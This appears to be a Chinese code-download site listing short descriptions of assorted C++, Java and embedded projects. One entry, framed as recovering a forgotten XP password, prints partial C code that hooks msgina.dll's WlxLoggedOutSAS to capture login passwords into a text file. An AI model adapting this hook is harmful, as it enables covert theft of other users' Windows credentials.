-
VC++做的闹钟程序 功能很多,并且界面很漂亮.
VC++做的闹钟程序 功能很多,并且界面很漂亮.-VC so many alarm clock function procedures, and the interface is very beautiful.
- 2022-01-25 23:07:55下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
Experimental C++ programming algorithm with backtracking to solve 01 backpack
算法实验C++编程用回溯法解决01背包问题-Experimental C++ programming algorithm with backtracking to solve 01 backpack
- 2023-04-02 17:30:05下载
- 积分:1
-
GumstixII system wince6.0 the bsp, intel cpu is the xscale, is the installation...
GumstixII系统的wince6.0的bsp,cpu是intel的xscale,压缩後是安装文件,安装后会在ce文件夹下产生原代码文件夹-GumstixII system wince6.0 the bsp, intel cpu is the xscale, is the installation of compressed paper, After installation in ce folder under the original code folder
- 2022-01-28 15:45:46下载
- 积分:1
-
根据网站的URL地址进行数据采集,主要是针对股票数据
根据网站的URL地址进行数据采集,主要是针对股票数据-According to the website URL address data collection, mainly for stock data
- 2022-09-13 13:05:03下载
- 积分:1
-
javaWeb项目使用springboot集成redis
javaWeb项目使用springboot集成redis
- 2022-02-28 12:00:50下载
- 积分:1
-
small voice chip players procedures for reference!
语音播放芯片小程序,供参考!-small voice chip players procedures for reference!
- 2022-03-19 15:54:29下载
- 积分:1
-
simuladro de robots moviles con obstacules
simuladro de robots moviles con obstacules
- 2022-10-31 14:20:02下载
- 积分:1
-
edit编辑框的使用!!列举了程序实现编辑框的几个主要功能
edit编辑框的使用!!列举了程序实现编辑框的几个主要功能-edit the use of edit box!! listed procedures realize edit box several major functional
- 2023-05-03 22:40:03下载
- 积分:1
-
fillin small vc procedures used in the preparation of small programs can s
写留言的小程序
用vc++编写的小程序
可以-fillin small vc procedures used in the preparation of small programs can s
- 2022-04-26 21:14:10下载
- 积分:1